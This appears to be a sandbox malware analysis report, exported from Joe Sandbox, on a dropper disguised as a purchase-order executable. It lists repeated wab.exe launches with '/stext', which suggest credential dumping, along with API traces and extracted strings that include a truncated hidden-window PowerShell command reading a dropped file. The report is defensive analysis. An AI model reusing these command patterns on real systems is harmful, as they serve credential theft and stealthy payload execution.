Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	20.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.8%
Total number of Nodes:	1384
Total number of Limit Nodes:	26

Executed Functions

Function 00403645 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403668
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403693
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036A6
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040373F
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040377C
OleInitialize.OLE32(00000000), ref: 00403783
SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037A2
GetCommandLineW.KERNEL32(00428A60,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037B7
CharNextW.USER32(00000000,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe",00000020,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe",00000000,?,00000008,0000000A,0000000C), ref: 004037F0
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403928
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403939
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403945
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403961
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403972
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040397A
DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040398E
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A67

Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F

wsprintfW.USER32 ref: 00403AC4
GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 00403AF7
DeleteFileW.KERNEL32(0042C800), ref: 00403B03
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B31

Part of subcall function 00406442: MoveFileExW.KERNEL32(?,?,00000005,00405F40,?,00000000,000000F1,?,?,?,?,?), ref: 0040644C

CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403B47

Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B

Part of subcall function 004069DF: FindFirstFileW.KERNELBASE(74DF3420,00425F98,00425750,004060A2,00425750,00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004069EA
Part of subcall function 004069DF: FindClose.KERNEL32(00000000), ref: 004069F6

OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B95
ExitProcess.KERNEL32 ref: 00403BB2
CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BB9
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BD5
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BDC
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BF1
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C14
ExitWindowsEx.USER32(00000002,80040002), ref: 00403C39
ExitProcess.KERNEL32 ref: 00403C5C

Part of subcall function 00405C30: CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36

Strings

1033, xrefs: 00403989
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040365C
C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238, xrefs: 0040390D, 00403A2F, 00403A7C, 00403A8A
TMP, xrefs: 00403975
TEMP, xrefs: 0040396D
C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes, xrefs: 00403A3A
\Temp, xrefs: 0040393F
NSIS Error, xrefs: 004037A8
C:\Users\user\AppData\Local\Temp\, xrefs: 0040391D, 00403922, 00403938, 00403944, 00403953, 00403960, 0040396C, 00403974, 00403A62, 00403AE3, 00403B0F, 00403B30, 00403B39
UXTHEME, xrefs: 00403733, 00403738, 0040373E
"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe", xrefs: 004037BD, 004037C3, 004037D8, 004039B6
C:\Users\user\Desktop, xrefs: 00403A85
SeShutdownPrivilege, xrefs: 00403BEB
Error launching installer, xrefs: 00403A10
Low, xrefs: 0040395B
"powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\A, xrefs: 00403A72
~nsu%X.tmp, xrefs: 00403ABB

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: "C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"$"powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\A$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 1813718867-3132114228
Opcode ID: cb08dbe130f91360e7a1dfc8e1a880fb8121424293655edcd1d70ad09613bc60
Instruction ID: d2a3103bd0adf94391fd0ebfa47e937d37e61a7cc597b22c14a72094b2238e17
Opcode Fuzzy Hash: cb08dbe130f91360e7a1dfc8e1a880fb8121424293655edcd1d70ad09613bc60
Instruction Fuzzy Hash: 4CF1E531604300AAD320AF759D05B2B7EE8AB8570AF11483FF585B22D1DB7C9A41CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405846 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 004058A4
GetDlgItem.USER32(?,000003EE), ref: 004058B3
GetClientRect.USER32(?,?), ref: 004058F0
GetSystemMetrics.USER32(00000002), ref: 004058F7
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405918
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405929
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040593C
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040594A
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040595D
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040597F
ShowWindow.USER32(?,00000008), ref: 00405993
GetDlgItem.USER32(?,000003EC), ref: 004059B4
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059C4
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059DD
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059E9
GetDlgItem.USER32(?,000003F8), ref: 004058C2

Part of subcall function 00404636: SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644

GetDlgItem.USER32(?,000003EC), ref: 00405A06
CreateThread.KERNELBASE(00000000,00000000,Function_000057DA,00000000), ref: 00405A14
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405A1B
ShowWindow.USER32(00000000), ref: 00405A3F
ShowWindow.USER32(?,00000008), ref: 00405A44
ShowWindow.USER32(00000008), ref: 00405A8E
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AC2
CreatePopupMenu.USER32 ref: 00405AD3
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AE7
GetWindowRect.USER32(?,?), ref: 00405B07
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B20
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B58
OpenClipboard.USER32(00000000), ref: 00405B68
EmptyClipboard.USER32 ref: 00405B6E
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B7A
GlobalLock.KERNEL32(00000000), ref: 00405B84
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B98
GlobalUnlock.KERNEL32(00000000), ref: 00405BB8
SetClipboardData.USER32(0000000D,00000000), ref: 00405BC3
CloseClipboard.USER32 ref: 00405BC9

Strings

{, xrefs: 00405AAC
H/B, xrefs: 00405B34

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: H/B${
API String ID: 4154960007-332483393
Opcode ID: 4ad71a5ae84d1442ca64332f301171ed24ad3ca4da0b040a8c0bb5ec3df77bcf
Instruction ID: 1bfd88ad0a039f30930ce625e3f17186fc56f4394c79b8c388f8475f2b475093
Opcode Fuzzy Hash: 4ad71a5ae84d1442ca64332f301171ed24ad3ca4da0b040a8c0bb5ec3df77bcf
Instruction Fuzzy Hash: A7B127B1900608FFDB21AF60DD85DAE7B79FB44354F00413AFA41A61A0CB795E52DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00405D8E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"), ref: 00405DB7
lstrcatW.KERNEL32(00424F50,\*.*), ref: 00405DFF
lstrcatW.KERNEL32(?,0040A014), ref: 00405E22
lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"), ref: 00405E28
FindFirstFileW.KERNELBASE(00424F50,?,?,?,0040A014,?,00424F50,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"), ref: 00405E38
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ED8
FindClose.KERNEL32(00000000), ref: 00405EE7

Strings

"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe", xrefs: 00405D97
POB, xrefs: 00405DE7
\*.*, xrefs: 00405DF9

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"$POB$\*.*
API String ID: 2035342205-3638519621
Opcode ID: 5bbbe9736573e0873f2e1386b99e889a7b8e3f986854e9af084b80f90e64b115
Instruction ID: 5ad7ae4105776224b4bb644c15053e07d5ebc7bd6c5330578b1f64027da07968
Opcode Fuzzy Hash: 5bbbe9736573e0873f2e1386b99e889a7b8e3f986854e9af084b80f90e64b115
Instruction Fuzzy Hash: 6F41D330400A15AACB21AB65CC49BBF7678EF41718F24417FF895B11C1D77C4A82DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406DA0 Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
Instruction ID: 5203db86b2e08fd3ebfde089d8ff8c44169432d1db75552ad8ea7513f2b1afa9
Opcode Fuzzy Hash: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
Instruction Fuzzy Hash: 64F16570D04229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A86CF45

